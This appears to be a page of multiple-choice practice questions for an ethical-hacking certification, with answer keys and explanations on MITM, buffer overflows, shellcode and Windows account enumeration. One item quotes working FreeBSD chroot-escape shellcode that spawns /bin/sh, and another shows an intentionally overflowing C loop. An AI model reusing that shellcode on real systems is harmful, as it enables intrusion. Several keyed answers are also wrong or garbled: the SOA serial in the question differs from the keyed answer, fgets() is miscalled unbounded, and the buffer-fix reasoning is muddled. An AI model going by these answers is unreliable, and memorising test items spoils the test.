Topic 4, Enumeration
Eric has discovered a fantastic package of tools named Dsniff on the Internet. He
has learnt to use these tools in his lab and is now ready for real world exploitation.
He was able to effectively intercept communications between the two entities and
establish credentials with both sides of the connections. The two remote ends of the
communication never notice that Eric is relaying the information between the two.
What would you call this attack?
A. Interceptor
B. Man-in-the-middle
C. ARP Proxy
D. Poisoning Attack
Man-in-the-middle
Explanation: A man-in-the-middle attack (MITM) is an attack in which an attacker is able
to read, insert and modify at will, messages between two parties without either party
knowing that the link between them has been compromised.
A buffer overflow occurs when a program or process tries to store more data in a
buffer (temporary data storage area) than it was intended to hold.
What is the most common cause of buffer overflow in software today?
A. Bad permissions on files.
B. High bandwidth and large number of users.
C. Usage of non standard programming languages.
D. Bad quality assurance on software produced.
Bad quality assurance on software produced.
Explanation: Technically, a buffer overflow is a problem with the program's internal
implementation.
In Buffer Overflow exploit, which of the following registers gets overwritten with
return address of the exploit code?
A. EIP
B. ESP
C. EAP
D. EEP
EIP
Explanation: EIP is the instruction pointer, a register that points to the next
instruction to be executed.
Buffer X in an accounting application module for a company can contain 200
characters. The programmer assumes that 200 characters are more than enough, so
no proper boundary checks are conducted. Dave decides to insert 400 characters
into the 200-character buffer, which overflows the buffer. Below is the code
snippet:
void func(void)
{
    int i;
    char buffer[200];           /* fixed-size buffer: room for 200 characters */
    for (i = 0; i < 400; i++)   /* loop bound exceeds the buffer size: no boundary check */
        buffer[i] = 'A';        /* writes 400 characters into the 200-character buffer */
    return;
}
How can you protect/fix the problem of your application as shown above? (Choose
two)
A. Because the counter starts with 0, we would stop when the counter is less than 200.
B. Because the counter starts with 0, we would stop when the counter is more than 200.
C. Add a separate statement to signify that if we have written 200 characters to the buffer,
the stack should stop because it cannot hold any more data.
D. Add a separate statement to signify that if we have written less than 200 characters to
the buffer, the stack should stop because it cannot hold any more data.
Because the counter starts with 0, we would stop when the counter is less than 200.
Add a separate statement to signify that if we have written 200 characters to the buffer,
the stack should stop because it cannot hold any more data.
Explanation: I=199 would be character number 200. The stack holds exactly 200
characters, so there is no need to stop before 200.
Bob has a good understanding of cryptography, having worked with it for many
years. Cryptography is used to secure data from specific threats, but it does not
secure the application from coding errors. It can provide data privacy and integrity and
enable strong authentication, but it cannot mitigate programming errors.
What is a good example of a programming error that Bob can use to illustrate to the
management that encryption will not address all of their security concerns?
A. Bob can explain that a random generator can be used to derive cryptographic keys but it
uses a weak seed value and it is a form of programming error.
B. Bob can explain that by using passwords to derive cryptographic keys it is a form of a
programming error.
C. Bob can explain that a buffer overflow is an example of programming error and it is a
common mistake associated with poor programming technique.
D. Bob can explain that by using a weak key management technique it is a form of
programming error.
Bob can explain that a buffer overflow is an example of programming error and it is a
common mistake associated with poor programming technique.
Explanation: A buffer overflow occurs when you write a set of values (usually a string of
characters) into a fixed-length buffer and write at least one value outside that buffer's
boundaries (usually past its end). A buffer overflow can occur when reading input from the
user into a buffer, but it can also occur during other kinds of processing in a program.
Technically, a buffer overflow is a problem with the program's internal implementation.
Exhibit:
The following is an entry captured by a network IDS. You are assigned the task of
analyzing this entry. You notice the value 0x90, which is the most common NOOP
instruction for the Intel processor. You figure that the attacker is attempting a buffer
overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an
analyst what would you conclude about the attack?
A. The buffer overflow attack has been neutralized by the IDS
B. The attacker is creating a directory on the compromised machine
C. The attacker is attempting a buffer overflow attack and has succeeded
D. The attacker is attempting an exploit that launches a command-line shell
The attacker is attempting an exploit that launches a command-line shell
Explanation: This log entry shows an attacker using a buffer overflow to fill the data buffer
and trying to insert the execution of /bin/sh into the executable code part of the thread. It is
probably an existing exploit that is being used, or a directed attack with a custom-built buffer
overflow whose "payload" launches the command shell.
The programmers on your team are analyzing the free, open source software being
used to run FTP services on a server. They notice that there is an excessive number
of fgets() and gets() calls in the source code. These C++ functions do not check bounds.
What kind of attack is this program susceptible to?
A. Buffer of Overflow
B. Denial of Service
C. Shatter Attack
D. Password Attack
Buffer of Overflow
Explanation: C users must avoid using dangerous functions that do not check bounds
unless they've ensured that the bounds will never be exceeded. A buffer overflow occurs
when you write a set of values (usually a string of characters) into a fixed-length buffer and
write at least one value outside that buffer's boundaries (usually past its end). A buffer
overflow can occur when reading input from the user into a buffer, but it can also occur
during other kinds of processing in a program.
#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)>>8), \
    (((x)&0xff0000)>>16), (((x)&0xff000000)>>24)
char infin_loop[]=
/* for testing purposes */
"\xEB\xFE";
char bsdcode[] =
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
char *target=NULL, *username="user", *password=NULL;
struct targets getit;
The following exploit code is extracted from what kind of attack?
A. Remote password cracking attack
B. SQL Injection
C. Distributed Denial of Service
D. Cross Site Scripting
E. Buffer Overflow
Buffer Overflow
Explanation: This is a buffer overflow with its payload in hex format.
One of your team members has asked you to analyze the following SOA record.
What is the version?
Rutgers.edu. SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400)
A. 200303028
B. 3600
C. 604800
D. 2400
E. 60
F. 4800
200303028
Explanation: The SOA serial number starts with the format YYYYMMDDVV, where VV is the version.
When writing shellcodes, you must avoid _________________ because these will
end the string.
A. Null Bytes
B. Root Bytes
C. Char Bytes
D. Unicode Bytes
Null Bytes
Explanation: The null character (also null terminator) is a character with the value zero,
present in the ASCII and Unicode character sets, and available in nearly all mainstream
programming languages. The original meaning of this character was like NOP — when
sent to a printer or a terminal, it does nothing (some terminals, however, incorrectly display
it as space). Strings ending in a null character are said to be null-terminated.
John is a keen administrator and has followed all of the best practices he could
find on securing his Windows Server. He has renamed the Administrator account to
a new name that he is sure cannot be easily guessed. However, people are
already attempting to compromise his newly renamed administrator account.
How is it possible for a remote attacker to decipher the name of the administrator
account if it has been renamed?
A. The attacker used the user2sid program.
B. The attacker used the sid2user program.
C. The attacker used nmap with the –V switch.
D. The attacker guessed the new name.
The attacker used the sid2user program.
Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager)
on the local or a remote machine. Sid2user.exe can then be used to retrieve the names of
all the user accounts and more. These utilities do not exploit a bug but call the functions
LookupAccountName and LookupAccountSid respectively. What is more, these can be
called against a remote machine without providing logon credentials, save those needed for
a null session connection.